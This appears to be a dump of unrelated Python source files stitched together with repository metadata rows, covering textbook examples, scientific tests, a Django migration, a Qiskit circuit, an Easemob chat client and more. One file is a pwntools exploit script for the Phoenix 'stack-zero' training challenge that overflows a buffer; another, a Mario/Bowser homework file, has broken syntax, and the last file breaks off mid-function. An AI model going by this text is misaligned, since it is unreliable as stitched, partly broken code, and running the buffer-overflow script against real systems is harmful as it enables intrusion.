# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2019
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Terceira edição - Janeiro/2019 - ISBN 978-85-7522-718-3
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem3\capítulo 09\09.25.py
# Descrição:
##############################################################################
import os
# Cria um arquivo e o fecha imediatamente
open("morimbundo.txt", "w").close()
os.mkdir("vago")
os.rmdir("vago")
os.remove("morimbundo.txt")
| [
"jose.cicero@gmail.com"
] | jose.cicero@gmail.com |
b885ba8f387ada4c7ad6cb63a67d0b8cf0c862d8 | 176839e6f94e593fb957f0af1bd5682c95e44f8f | /exoplanet/light_curves_test.py | be8699a85c7d2b5d7e809bde2bd08d05d2d5009e | [
"MIT"
] | permissive | Junjun1guo/exoplanet | 8a0a9d4deb351744a78db54801c4a9d9834e7f7a | 5df07b16cf7f8770f02fa53598ae3961021cfd0f | refs/heads/master | 2020-05-17T17:51:14.836055 | 2019-04-26T20:10:28 | 2019-04-26T20:10:28 | 183,867,012 | 2 | 0 | null | 2019-04-28T06:38:30 | 2019-04-28T06:38:30 | null | UTF-8 | Python | false | false | 3,522 | py | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import numpy as np
import theano
import theano.tensor as tt
from theano.tests import unittest_tools as utt
import starry
from .orbits import KeplerianOrbit
from .light_curves import StarryLightCurve
def test_light_curve():
u = tt.vector()
b = tt.vector()
r = tt.vector()
lc = StarryLightCurve(u)
f = lc._compute_light_curve(b, r)
func = theano.function([u, b, r], f)
u_val = np.array([0.2, 0.3, 0.1, 0.5])
b_val = np.linspace(-1.5, 1.5, 100)
r_val = 0.1 + np.zeros_like(b_val)
m = starry.Map(lmax=len(u_val))
m[:] = u_val
expect = m.flux(xo=b_val, ro=r_val) - 1
evaluated = func(u_val, b_val, r_val)
utt.assert_allclose(expect, evaluated)
def test_light_curve_grad():
u_val = np.array([0.2, 0.3, 0.1, 0.5])
b_val = np.linspace(-1.5, 1.5, 20)
r_val = 0.1 + np.zeros_like(b_val)
lc = lambda u, b, r: StarryLightCurve(u)._compute_light_curve(b, r) # NOQA
utt.verify_grad(lc, [u_val, b_val, r_val])
def test_in_transit():
t = np.linspace(-20, 20, 1000)
m_planet = np.array([0.3, 0.5])
m_star = 1.45
orbit = KeplerianOrbit(
m_star=m_star,
r_star=1.5,
t0=np.array([0.5, 17.4]),
period=np.array([10.0, 5.3]),
ecc=np.array([0.1, 0.8]),
omega=np.array([0.5, 1.3]),
m_planet=m_planet,
)
u = np.array([0.2, 0.3, 0.1, 0.5])
r = np.array([0.1, 0.01])
lc = StarryLightCurve(u)
model1 = lc.get_light_curve(r=r, orbit=orbit, t=t)
model2 = lc.get_light_curve(r=r, orbit=orbit, t=t, use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
model1 = lc.get_light_curve(r=r, orbit=orbit, t=t, texp=0.1)
model2 = lc.get_light_curve(r=r, orbit=orbit, t=t, texp=0.1,
use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
def test_contact_bug():
orbit = KeplerianOrbit(period=3.456, ecc=0.6, omega=-1.5)
t = np.linspace(-0.1, 0.1, 1000)
u = [0.3, 0.2]
y1 = StarryLightCurve(u).get_light_curve(
orbit=orbit, r=0.1, t=t, texp=0.02).eval()
y2 = StarryLightCurve(u).get_light_curve(
orbit=orbit, r=0.1, t=t, texp=0.02, use_in_transit=False).eval()
assert np.allclose(y1, y2)
def test_small_star():
from batman.transitmodel import TransitModel, TransitParams
u_star = [0.2, 0.1]
r = 0.04221468
m_star = 0.151
r_star = 0.189
period = 0.4626413
t0 = 0.2
b = 0.5
ecc = 0.1
omega = 0.1
t = np.linspace(0, period, 500)
r_pl = r * r_star
orbit = KeplerianOrbit(
r_star=r_star, m_star=m_star,
period=period, t0=t0, b=b,
ecc=ecc, omega=omega)
a = orbit.a.eval()
incl = orbit.incl.eval()
lc = StarryLightCurve(u_star)
model1 = lc.get_light_curve(r=r_pl, orbit=orbit, t=t)
model2 = lc.get_light_curve(r=r_pl, orbit=orbit, t=t, use_in_transit=False)
vals = theano.function([], [model1, model2])()
utt.assert_allclose(*vals)
params = TransitParams()
params.t0 = t0
params.per = period
params.rp = r
params.a = a / r_star
params.inc = np.degrees(incl)
params.ecc = ecc
params.w = np.degrees(omega)
params.u = u_star
params.limb_dark = "quadratic"
model = TransitModel(params, t)
flux = model.light_curve(params)
utt.assert_allclose(vals[0][:, 0], flux - 1)
| [
"foreman.mackey@gmail.com"
] | foreman.mackey@gmail.com |
fefac4e918be7150dde77f0dc4af9eff39814d30 | 81357d11785eb03ec9abceb93e545e5fd9bcc156 | /tags/migrations/0001_initial.py | 96a74f82b4f97700d6efa346dfa4a211da721506 | [] | no_license | ytshaha/my-first-blog | f63dcc8372aac8cd0b1bfad47a67200b2b19772d | 7ee8c893e8c98cd0c290a1121b94f34110018525 | refs/heads/master | 2023-04-19T15:31:29.996220 | 2021-05-11T18:22:12 | 2021-05-11T18:22:12 | 328,199,497 | 0 | 0 | null | 2021-04-02T07:48:22 | 2021-01-09T16:39:27 | HTML | UTF-8 | Python | false | false | 804 | py | # Generated by Django 2.0.13 on 2021-02-06 05:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('products', '0009_auto_20210206_1411'),
]
operations = [
migrations.CreateModel(
name='Tag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('slug', models.SlugField()),
('timestamp', models.DateTimeField(auto_now_add=True)),
('active', models.BooleanField(default=True)),
('products', models.ManyToManyField(blank=True, to='products.Product')),
],
),
]
| [
"ytshaha@naver.com"
] | ytshaha@naver.com |
6fbbb3bc315903eca11f7f74467a6a187015f9b9 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startQiskit_noisy1712.py | 46f0c4c4192bdb4d1174a0955aa2b82bfb1f84e5 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,594 | py | # qubit number=5
# total number=59
import cirq
import qiskit
from qiskit.providers.aer import QasmSimulator
from qiskit.test.mock import FakeVigo
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.rx(-1.3603096190043806,input_qubit[2]) # number=28
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(repeat):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[3]) # number=34
prog.cz(input_qubit[4],input_qubit[3]) # number=35
prog.h(input_qubit[3]) # number=36
prog.h(input_qubit[0]) # number=38
prog.cz(input_qubit[1],input_qubit[0]) # number=39
prog.h(input_qubit[0]) # number=40
prog.cx(input_qubit[1],input_qubit[0]) # number=56
prog.x(input_qubit[0]) # number=57
prog.cx(input_qubit[1],input_qubit[0]) # number=58
prog.cx(input_qubit[1],input_qubit[0]) # number=33
prog.cx(input_qubit[0],input_qubit[1]) # number=24
prog.x(input_qubit[1]) # number=25
prog.x(input_qubit[1]) # number=41
prog.h(input_qubit[1]) # number=50
prog.cz(input_qubit[0],input_qubit[1]) # number=51
prog.h(input_qubit[1]) # number=52
prog.x(input_qubit[2]) # number=11
prog.cx(input_qubit[2],input_qubit[3]) # number=30
prog.x(input_qubit[3]) # number=12
prog.h(input_qubit[2]) # number=42
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[4]) # number=46
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=53
prog.cz(input_qubit[0],input_qubit[2]) # number=54
prog.h(input_qubit[2]) # number=55
prog.x(input_qubit[2]) # number=44
prog.h(input_qubit[2]) # number=47
prog.cz(input_qubit[0],input_qubit[2]) # number=48
prog.h(input_qubit[2]) # number=49
prog.rx(-1.9697785938008003,input_qubit[1]) # number=37
prog.h(input_qubit[2]) # number=19
prog.h(input_qubit[3]) # number=20
prog.x(input_qubit[1]) # number=22
prog.x(input_qubit[1]) # number=23
# circuit end
for i in range(n):
prog.measure(input_qubit[i], classical[i])
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = FakeVigo()
sample_shot =7924
info = execute(prog, backend=backend, shots=sample_shot).result().get_counts()
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_noisy1712.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
79d2fec2bf81ef4ccc513a92b42f779ce80f0a75 | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW10_20210724225915.py | 1e1595c2eeb3d376be15b9124994b1197d270cce | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,917 | py | """
Georgia Institute of Technology - CS1301
Homework 08 - Object Oriented Programming
"""
class Mario:
def __init__(self, name, lives, coins, isAlive):
self.name = name
self.lives = lives
self.coins = coins
self.isAlive = isAlive
# the following method is provided to you
def __eq__(self, other):
return (self.name == other.name and
self.lives == other.lives and
self.coins == other.coins and
self.isAlive == other.isAlive)
# the following method is provided to you
def __repr__(self):
return f"Mario({self.name})"
def gainCoins(self, numberOfCoins):
self.coins += numberOfCoins
def gainCoins(self):
self.coins += 5
def loseLife(self):
if self.lives != 0:
self.lives -= 1
if self.lives == 0:
self.isAlive = False
def gainLife(self):
if self.lives > 0 and self.lives < 3:
self.lives += 1
elif self.lives >= 3:
self.coins += 10
def __str__(self):
return "Hi! I am {}. I have {} lives left and {} coins.".format(self.name, self.lives, self.coins)
##########################################################
class Bowser:
def __init__(self, name, lives, isAlive)
# the following method is provided to you
def __eq__(self, other):
return (self.name == other.name and
self.lives == other.lives and
self.isAlive == other.isAlive)
# the following method is provided to you
def __repr__(self):
return f"Bowser({self.name})"
##########################################################
class World:
# the following method is provided to you
def __repr__(self):
return f"World({self.name}, {self.bowser})"
mario = Mario('mario1', 5, 20, False)
print(mario) | [
"sanjay.mamidipaka@gmail.com"
] | sanjay.mamidipaka@gmail.com |
3a0ee48998c73dcaba59b9b6952779f01f19b873 | b3ac393b2e30d8dfa403a0f70ef3e112781aef05 | /tensorflow_attention/Dynamic-Memory-Networks-in-TensorFlow/attention_gru_cell.py | 681887ced27dfd2aba57b28ab75d3eccb1d9b039 | [
"MIT"
] | permissive | xiongfeihtp/attention | d948038dd8dd3c633fde003b61b48fd74308b5bb | ad2140235462e423860e1ddc3be6f2d587f5aed9 | refs/heads/master | 2021-05-16T16:25:27.541002 | 2018-02-02T06:23:55 | 2018-02-02T06:23:55 | 119,941,390 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,962 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import math
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import embedding_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import partitioned_variables
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops.math_ops import sigmoid
from tensorflow.python.ops.math_ops import tanh
from tensorflow.python.ops.rnn_cell_impl import RNNCell
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import nest
class AttentionGRUCell(RNNCell):
"""Gated Recurrent Unit incoporating attention (cf. https://arxiv.org/abs/1603.01417).
Adapted from https://github.com/tensorflow/tensorflow/blob/master/tensorflow/contrib/rnn/python/ops/core_rnn_cell_impl.py
NOTE: Takes an input of shape: (batch_size, max_time_step, input_dim + 1)
Where an input vector of shape: (batch_size, max_time_step, input_dim)
and scalar attention of shape: (batch_size, max_time_step, 1)
are concatenated along the final axis"""
def __init__(self, num_units, input_size=None, activation=tanh):
if input_size is not None:
logging.warn("%s: The input_size parameter is deprecated.", self)
self._num_units = num_units
self._activation = activation
@property
def state_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
"""Attention GRU with nunits cells."""
with vs.variable_scope(scope or "attention_gru_cell"):
with vs.variable_scope("gates"): # Reset gate and update gate.
# We start with bias of 1.0 to not reset and not update.
if inputs.get_shape()[-1] != self._num_units + 1:
raise ValueError("Input should be passed as word input concatenated with 1D attention on end axis")
# extract input vector and attention
inputs, g = array_ops.split(inputs,
num_or_size_splits=[self._num_units,1],
axis=1)
r = _linear([inputs, state], self._num_units, True)
r = sigmoid(r)
with vs.variable_scope("candidate"):
r = r*_linear(state, self._num_units, False)
with vs.variable_scope("input"):
x = _linear(inputs, self._num_units, True)
h_hat = self._activation(r + x)
new_h = (1 - g) * state + g * h_hat
return new_h, new_h
def _linear(args, output_size, bias, bias_start=0.0):
"""Linear map: sum_i(args[i] * W[i]), where W[i] is a variable.
Args:
args: a 2D Tensor or a list of 2D, batch x n, Tensors.
output_size: int, second dimension of W[i].
bias: boolean, whether to add a bias term or not.
bias_start: starting value to initialize the bias; 0 by default.
Returns:
A 2D Tensor with shape [batch x output_size] equal to
sum_i(args[i] * W[i]), where W[i]s are newly created matrices.
Raises:
ValueError: if some of the arguments has unspecified or wrong shape.
"""
if args is None or (nest.is_sequence(args) and not args):
raise ValueError("`args` must be specified")
if not nest.is_sequence(args):
args = [args]
# Calculate the total size of arguments on dimension 1.
total_arg_size = 0
shapes = [a.get_shape() for a in args]
for shape in shapes:
if shape.ndims != 2:
raise ValueError("linear is expecting 2D arguments: %s" % shapes)
if shape[1].value is None:
raise ValueError("linear expects shape[1] to be provided for shape %s, "
"but saw %s" % (shape, shape[1]))
else:
total_arg_size += shape[1].value
dtype = [a.dtype for a in args][0]
# Now the computation.
scope = vs.get_variable_scope()
with vs.variable_scope(scope) as outer_scope:
weights = vs.get_variable(
"weights", [total_arg_size, output_size], dtype=dtype)
if len(args) == 1:
res = math_ops.matmul(args[0], weights)
else:
res = math_ops.matmul(array_ops.concat(args, 1), weights)
if not bias:
return res
with vs.variable_scope(outer_scope) as inner_scope:
inner_scope.set_partitioner(None)
biases = vs.get_variable(
"biases", [output_size],
dtype=dtype,
initializer=init_ops.constant_initializer(bias_start, dtype=dtype))
return nn_ops.bias_add(res, biases)
| [
"386344277@qq.com"
] | 386344277@qq.com |
86e22796fd49804a0b71c6dc36f1b9ad6bb9a40b | 7950c4faf15ec1dc217391d839ddc21efd174ede | /leetcode-cn/0888.2_Fair_Candy_Swap.py | c6375c9f5055643919390828fb7f897dce3fe0f8 | [] | no_license | lixiang2017/leetcode | f462ecd269c7157aa4f5854f8c1da97ca5375e39 | f93380721b8383817fe2b0d728deca1321c9ef45 | refs/heads/master | 2023-08-25T02:56:58.918792 | 2023-08-22T16:43:36 | 2023-08-22T16:43:36 | 153,090,613 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 672 | py | '''
approach: Set
Time: O(M + N + M * 1) = O(M + N)
Space: O(N)
执行结果:通过
显示详情
执行用时:328 ms, 在所有 Python 提交中击败了91.76%的用户
内存消耗:15.5 MB, 在所有 Python 提交中击败了21.18%的用户
'''
class Solution(object):
def fairCandySwap(self, A, B):
"""
:type A: List[int]
:type B: List[int]
:rtype: List[int]
"""
sumA, sumB = sum(A), sum(B)
setB = set(B)
target_diff = (sumB - sumA) / 2
for x in A:
if x + target_diff in setB:
return [x, x + target_diff]
print 'not found'
return -1
| [
"lixiang@rxthinking.com"
] | lixiang@rxthinking.com |
0e55056f6bf6705900cc18bca79256d0f9cdfd70 | 200e0840fb8d5c71de509c1325fc1295336109f8 | /E_Pasal/urls.py | c85b9fe9aa3ca600b55f56d73781c551f6dc3e23 | [] | no_license | LakpaSherpa/E-pasal | d27ee490f6efdd27dee6b27c798e00402d6da07a | c144d45ecaa7e9feee8c507a9e54dd84632c314d | refs/heads/master | 2020-05-04T04:49:03.426196 | 2019-04-02T01:48:13 | 2019-04-02T01:48:13 | 178,974,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | """epasal URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib import admin
from django.urls import path
from django.conf.urls.static import static
from django.conf import settings
from cms.views import SignUpView
from shop.views import Homepage, ProductView, CartView, CategoryApi
urlpatterns = [
path('admin/', admin.site.urls),
path('', Homepage.as_view(), name='Homepage'),
path('product/<int:product_id>', ProductView.as_view(), name='product-page'),
path('accounts/', include('django.contrib.auth.urls')),
path('signup', SignUpView.as_view(), name='signup'),
path('cart/<int:product_id>', CartView.as_view(), name='cart_page'),
path('api','Categories',CategoryApi.as_view()),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"you@example.com"
] | you@example.com |
e734bd3f2156c38cad54ed1111896981ce383c57 | ea7d2090ba1d66fc5bf91b255742ae07e1f74c3d | /exploit_education/phoenix/challs/stack-zero.py | 4bdf71baace7d0a28f3bf95cfd665fd60991737f | [] | no_license | arty-hlr/CTF-writeups | 1a3e29b9a3c3b80e33df0c9489cacd6ec09e46fe | 64bcda1d1d8893c2ece308f82348755a2c62ca9e | refs/heads/master | 2022-08-04T20:26:07.428393 | 2022-07-30T11:11:34 | 2022-07-30T11:11:34 | 167,851,059 | 4 | 3 | null | 2022-07-30T10:55:11 | 2019-01-27T19:47:03 | Python | UTF-8 | Python | false | false | 1,294 | py | from pwn import *
context(terminal=['tmux','new-window'])
exe = context.binary = ELF('stack-zero')
host = args.HOST or 'localhost'
port = int(args.PORT or 2222)
user = args.USER or 'user'
password = args.PASSWORD or 'user'
remote_path = '/opt/phoenix/amd64/stack-zero'
# Connect to the remote SSH server
shell = None
if not args.LOCAL:
shell = ssh(user, host, port, password)
shell.set_working_directory(symlink=True)
def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
'''Execute the target binary on the remote host'''
if args.GDB:
return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
else:
return shell.process([remote_path] + argv, *a, **kw)
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.LOCAL:
return local(argv, *a, **kw)
else:
return remote(argv, *a, **kw)
gdbscript = '''
tbreak main
continue
'''.format(**locals())
# -- Exploit goes here --
io = start()
io.sendline(b'a'*100)
io.recvline()
print(io.recvall().decode())
# io.interactive()
| [
"flrn.pjd@protonmail.com"
] | flrn.pjd@protonmail.com |
348c1cf02933653a42d99e5cfad410ff4ad2f63a | 4df60d6ad3e6227caaefac1b6775e66718ff28ea | /easemob/client.py | e7210c34f3219eeb9354d72da9d570bef5414f79 | [] | no_license | cash2one/ESNS | 00d09a73e33705a8421438e762fdfc52aba58b8d | f8b5cb3adcb8c907834ec3fad1f82bf36be688b7 | refs/heads/master | 2021-01-13T17:01:23.622918 | 2016-03-23T03:11:15 | 2016-03-23T03:11:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,020 | py | # coding=utf-8
# Date: 15/1/19'
# Email: wangjian2254@icloud.com
import threading
from requests.auth import AuthBase
from easemob.models import HuanXin
from django.conf import settings
__author__ = u'王健'
import requests
import json
from time import time
JSON_HEADER = {'content-type': 'application/json'}
# EASEMOB_HOST = "http://localhost:8080"#
EASEMOB_HOST = "https://a1.easemob.com/%s/%s/" % (settings.HUANXIN_ORG, settings.HUANXIN_APP)
EASEMOB_HOST_USERS = '%susers' % EASEMOB_HOST
EASEMOB_HOST_GROUPS = '%schatgroups' % EASEMOB_HOST
DEBUG = False
def put(url, payload, auth=None):
"""
put 方法访问
by:王健 at:2015-2-27
:param url:
:param payload:
:param auth:
:return:
"""
r = requests.put(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)
return http_result(r)
def post(url, payload, auth=None):
"""
post 方法访问
by:王健 at:2015-1-20
:param url:
:param payload:
:param auth:
:return:
"""
r = requests.post(url, data=json.dumps(payload), headers=JSON_HEADER, auth=auth)
return http_result(r)
def get(url, auth=None):
"""
get 方法访问
by:王健 at:2015-1-20
:param url:
:param auth:
:return:
"""
r = requests.get(url, headers=JSON_HEADER, auth=auth)
return http_result(r)
def delete(url, auth=None):
"""
delete 方法访问
by:王健 at:2015-1-20
:param url:
:param auth:
:return:
"""
r = requests.delete(url, headers=JSON_HEADER, auth=auth)
return http_result(r)
def http_result(r):
"""
结果处理
by:王健 at:2015-1-20
记录错误日志
by:王健 at:2015-3-12
:param r:
:return:
"""
if DEBUG:
error_log = {
"method": r.request.method,
"url": r.request.url,
"request_header": dict(r.request.headers),
"response_header": dict(r.headers),
"response": r.text
}
if r.request.body:
error_log["payload"] = r.request.body
print json.dumps(error_log)
if r.status_code == requests.codes.ok:
return True, r.json()
else:
import logging
log = logging.getLogger('django')
log.error(r.text)
return False, r.text
def register_new_user(username, password):
"""
注册新的app用户
POST /{org}/{app}/users {"username":"xxxxx", "password":"yyyyy"}
by:王健 at:2015-1-20
"""
payload = {"username": username, "password":password}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_USERS, payload, token)
def reset_password(username, password=''):
"""
重置环信密码
POST /{org}/{app}/users {"username":"xxxxx", "password":"yyyyy"}
by:尚宗凯 at:2015-3-19
修改函数名称,改为put方法
by:尚宗凯 at:2015-3-19
"""
payload = {"username": username, "password":password}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return put(EASEMOB_HOST_USERS, payload, token)
def get_group_members(group_id):
"""
更新群组成员
GET /{org}/{app}/chatgroups/group_id/users
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return get(EASEMOB_HOST_GROUPS + '/%s/users' % group_id, token)
def add_group_member(group_id, usernames):
"""
更新群组成员
POST /{org}/{app}/chatgroups/group_id/users
by:王健 at:2015-2-27
修改为添加单个用户
by:王健 at:2015-2-28
"""
# payload = {"usernames": usernames}
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_GROUPS + '/%s/users/%s' % (group_id, usernames), None, token)
def delete_group_member(group_id, username):
"""
更新群组成员
DELETE /{org}/{app}/chatgroups/group_id/users/username
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return delete(EASEMOB_HOST_GROUPS + '/%s/users/%s' % (group_id, username), token)
def register_new_group(payload):
"""
注册新的app用户
POST /{org}/{app}/chatgroups
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return post(EASEMOB_HOST_GROUPS, payload, token)
def update_group_info(group_id, payload):
"""
注册新的app用户
PUT /{org}/{app}/chatgroups/group_id
by:王健 at:2015-2-27
"""
if token.is_not_valid():
return False, u'系统错误(HX_Token),请联系管理员'
return put(EASEMOB_HOST_GROUPS + '/%s' % group_id, payload, token)
class Token(AuthBase):
"""
从数据库中获取 token
by:王健 at:2015-1-20
"""
def __call__(self, r):
r.headers['Authorization'] = 'Bearer ' + self.get_token()
return r
def get_token(self):
"""
获取token信息
by:王健 at:2015-1-20
:return:
"""
return self.token
def __init__(self,):
self.token = None
self.exipres_in = 0
self.authing = False
def make_token(self):
"""
从数据库中获取一个token
by:王健 at:2015-1-20
修复 环信 token bug
by:王健 at:2015-3-9
"""
tl = HuanXin.objects.filter(app=settings.HUANXIN_APP).order_by('-exipres_in')[:1]
for t in tl:
self.token = str(t.token)
self.exipres_in = t.exipres_in
self.authing = False
def is_not_valid(self):
"""这个token是否还合法, 或者说, 是否已经失效了, 这里我们只需要
检查当前的时间, 是否已经比或者这个token的时间过去了exipreis_in秒
即 current_time_in_seconds < (expires_in + token_acquired_time)
by:王健 at:2015-1-20
"""
return self.get_authimg(time() > self.exipres_in)
def get_authimg(self, valid):
"""
自动去获取,新的token
:param valid:
:return:
"""
if valid:
if not self.authing:
self.authing = True
AuthThread().start()
return valid
class AuthThread(threading.Thread):
"""
异步执行获取token的函数
by:王健 at:2015-1-20
修复bug,去除无用参数
by:王健 at:2015-3-8
:return:
"""
def __init__(self):
threading.Thread.__init__(self)
def run(self):
"""
执行获取token的函数
by:王健 at:2015-1-20
:return:
"""
import views
views.create_huanxin_token(None)
token.make_token()
token = Token()
token.make_token() | [
"appleface2050@qq.com"
] | appleface2050@qq.com |
f7ac58f84c3577f4f603147ee5be49f96f1f5b4a | b9f21bc90eed396dde950c30a1b482be0fb8ba30 | /library/web/mechanicaloup/prac2.py | 33041236a8c20f86afca8d40825615f2cf26c19d | [] | no_license | nanigasi-san/nanigasi | 127a21db1b31759908fd74cebabe240e5abf8267 | 5e3c3e78344dd9558cafe439beb272b9a80d0f3a | refs/heads/master | 2020-04-03T18:57:40.132489 | 2019-06-19T15:03:38 | 2019-06-19T15:03:38 | 155,504,101 | 1 | 0 | null | 2019-02-20T09:40:05 | 2018-10-31T05:33:11 | Python | UTF-8 | Python | false | false | 324 | py | """Example usage of MechanicalSoup to get the results from
DuckDuckGo."""
import mechanicalsoup
# Connect to duckduckgo
browser = mechanicalsoup.StatefulBrowser()
browser.open("https://github.com")
button_list = browser.get_current_page().find_all("button")
for button in button_list:
print(button)
print("="*30)
| [
"nanigasi.py@gmail.com"
] | nanigasi.py@gmail.com |
aa510a127eef08160fbd491053f6d820ca9c708e | 0bbc13968c2793878f24045b318a17bb31524eb1 | /new_adventure/UnconstrainedOptimizers.py | ad37c3048a40cf5310c67dcff1c0a2e191876b0d | [] | no_license | daniellengyel/new_adventure | 572f82baa5d159cdc541ba9d377a863c7f424981 | 2f83060f4005b9d35e40f0f0d4c6ed0875a26a93 | refs/heads/main | 2023-08-24T21:32:28.003051 | 2021-10-17T17:02:47 | 2021-10-17T17:02:47 | 307,684,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,505 | py | import numpy as np
import jax.numpy as jnp
from jax import random as jrandom
import jax
from functools import partial
from jax import lax
import time, sys
import pickle
from .Functions import LinearCombination, GaussianSmoothing
from .utils import get_barrier, get_potential
import os, psutil
process = psutil.Process(os.getpid())
def get_optimizer(config):
if "GaussianSmoothing" == config["optimization_name"]:
return GaussianSmoothingOptimization(config)
elif "Gradient_Descent" == config["optimization_name"]:
return Gradient_Descent(config)
class UnconstrainedOptimization:
def __init__(self, config):
self.config = config
self.obj = get_potential(config)
self.c1 = config["optimization_meta"]["c1"]
self.c2 = config["optimization_meta"]["c2"]
self.delta = config["optimization_meta"]["delta"]
self.with_neystrom = config["optimization_meta"]["with_neystrom"]
self.jrandom_key = jrandom.PRNGKey(config["optimization_meta"]["jrandom_key"])
self.linesearch = helper_linesearch(self.obj, self.c1, self.c2)
self.loop_steps_remaining = config["num_total_steps"]
self.verbose = True
def update(self, X, time_step, full_vals=False, full_path=False):
assert not (full_vals and full_path)
if full_path:
full_path_arr = [(X.copy(), time.time())]
if full_vals:
vals_arr = [(self.obj.f(X)[0], time.time())]
t = 0
while self.loop_steps_remaining > 0:
self.loop_steps_remaining -= 1
t += 1
# get search direction
self.jrandom_key, subkey = jrandom.split(self.jrandom_key)
